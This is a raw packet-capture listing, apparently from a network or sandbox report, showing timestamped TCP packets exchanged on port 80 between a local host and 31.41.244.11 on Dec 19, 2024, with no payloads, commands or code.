                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.049626112 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.050506115 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.050678015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.050755024 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.051661968 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.051696062 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.051763058 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.052666903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.052721024 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.052905083 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.052958012 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.053874969 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.053910017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.053922892 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.053955078 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.054883957 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.055059910 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.055110931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.055891991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.055943012 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.056061029 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.056107044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.057075024 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.057122946 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.057240009 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.057286024 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.058057070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.058228970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.058279037 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.059236050 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.059272051 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.059288979 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.059324980 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.060399055 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.060434103 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.060448885 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.060480118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.061331034 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.061381102 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.061485052 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.061532974 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.062608957 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.062643051 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.062690020 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.063602924 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.063649893 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.063771009 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.063821077 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.064575911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.064623117 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.064730883 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.064780951 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.065824986 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.065872908 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.066005945 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.066050053 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.066720009 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.066768885 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.066829920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.066885948 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.067452908 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.067572117 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.067625046 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.068536997 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.068669081 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.068717957 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.069638968 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.069688082 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.069747925 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.069839954 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073196888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073230028 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073266029 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073278904 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073313951 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073350906 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073384047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073396921 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073435068 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073517084 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.073561907 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.074369907 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.074536085 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.074587107 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.075668097 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.075716972 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.075853109 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.075895071 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.076647997 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.076682091 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.076694965 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.076728106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.077697992 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.077744961 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.077852964 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.077898979 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.078841925 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.078876019 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.078926086 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.079449892 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.079497099 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.079576969 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.079624891 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.080526114 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.080573082 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.080701113 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.080748081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.081624031 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.081670046 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.081743956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.081788063 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.082705975 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.082828045 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.082878113 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.083853006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.083889008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.083901882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.083941936 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.219712973 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.219782114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.219852924 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.219897985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.220351934 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.220398903 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.220519066 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.220560074 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.221323967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.221373081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.221472025 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.221596003 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.222472906 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.222821951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.222876072 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.222954988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.223005056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.223983049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.224020004 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.224070072 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.225003958 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.225059986 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.225137949 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.225184917 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.226241112 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.226281881 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.226330042 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.227346897 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.227385044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.227451086 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.228358984 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.228394032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.228420019 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.228445053 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.229444027 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.229481936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.229497910 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.229531050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.230529070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.230700970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.230752945 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.231498957 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.231554985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.231632948 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.231681108 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.232584000 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.232656002 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.232731104 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.232877970 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.233730078 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.233907938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.233963966 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.234877110 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.234944105 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.235057116 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.235281944 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.235867977 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.235925913 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.236038923 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.236084938 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.237041950 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.237077951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.237087965 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.237123013 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.238004923 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.238053083 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.238169909 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.239276886 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.239330053 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.239331007 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.239370108 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.240266085 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.240427017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.240453959 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.240469933 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.241394043 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.241450071 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.241560936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.241705894 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.242384911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.242438078 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.242558956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.242887974 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.243673086 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.243710041 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.243758917 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.244538069 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.244589090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.244810104 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.244856119 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.245429993 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.245465040 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.245508909 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.246350050 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.246436119 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.246465921 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.246505022 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.249577999 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.249630928 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.249706030 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.249838114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.250228882 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.250262976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.250282049 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.250298977 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.250308990 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.250334024 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.250339985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.250391006 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.251070023 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.251113892 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.251250982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.251296997 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.252298117 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.252427101 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.252444029 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.252489090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.253418922 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.253453016 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.253475904 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.253499031 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.254365921 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.254451036 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.254525900 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.254573107 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.255511999 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.255570889 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.255666971 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.255711079 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.256624937 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.256673098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.256779909 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.256823063 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.257622957 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.257671118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.257786036 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.257827997 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.258898973 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.258934975 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.258980036 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.259905100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.259939909 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.259951115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.259985924 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.260974884 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.261022091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.261125088 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.261166096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.262025118 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.262073040 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.262164116 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.262216091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.263227940 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.263269901 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.263322115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.264240980 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.264281988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.264293909 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.264328957 CET4983880192.168.2.431.41.244.11
